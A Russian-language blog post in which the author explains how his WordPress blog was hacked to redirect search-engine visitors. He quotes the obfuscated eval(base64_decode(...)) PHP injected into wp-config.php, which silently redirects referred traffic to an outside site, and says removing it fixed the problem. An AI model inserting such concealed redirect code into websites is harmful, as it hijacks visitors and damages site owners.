Блог взломали

wordpress вордпресс взлом hack redirect перенаправлениеНа днях у меня резко упала посещаемость. Вначале я решил, что выходные, а в выходные посещаемость всегда падает. Но потом жене понадобилось зайти на блог с поисковой системы и ее перебросило по какой-то странной ссылке http://yes.mefound.com/?said=3333g&q=. Так я с удивлением узнал, что кто-то в сети взломал блог и поставил перенаправление.

Взлом сделали видимо через какую-то уязвимость WordPress. Просто добавили в файл wp-config.php вот такую функцию:

<?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF
6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydI
VFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1Y
WcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikpewppZiAoc3RyaXN0cigkcmVmZXJlci
wieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciw
icmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVy
LCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlc
mVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZW
ZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9
yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwu
Y29tIikgb3IgcHJlZ19tYXRjaCgiL3lhbmRleFwucnVcL3lhbmRzZWFyY2hcPyguKj8pXCZsclw9L
yIsJHJlZmVyZXIpIG9yIHByZWdfbWF0Y2ggKCIvZ29vZ2xlXC4oLio/KVwvdXJsXD9zYS8iLCRyZW
ZlcmVyKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJteXNwYWNlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmV
yZXIsImZhY2Vib29rLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYg
KCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpK
XsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9yb2xsb3Zlci53aWthYmEuY29tLyIpOw0KZXhpdC
gpOw0KfQp9DQp9DQp9DQp9"));

В интернете пишут, что нужно переставлять wordpress с нуля, но мне было достаточно удалить эту функцию из файла wp-config.php и перенаправление прекратилось. Дополнительно я позакрывал разные дырки в безопасности, чего и вам желаю.

Подписывайтесь на новости
подписка на rss ленту страница в twitter страница в facebook группа ВКонтакте Livejournal
VN:F [1.9.21_1169]
Rating: 10.0/10 (2 votes cast)
Понравилась статья? Если хотите сказать спасибо, нажмите любую социальную кнопку
0

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

*

Можно использовать следующие HTML-теги и атрибуты: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Подписаться, не комментируя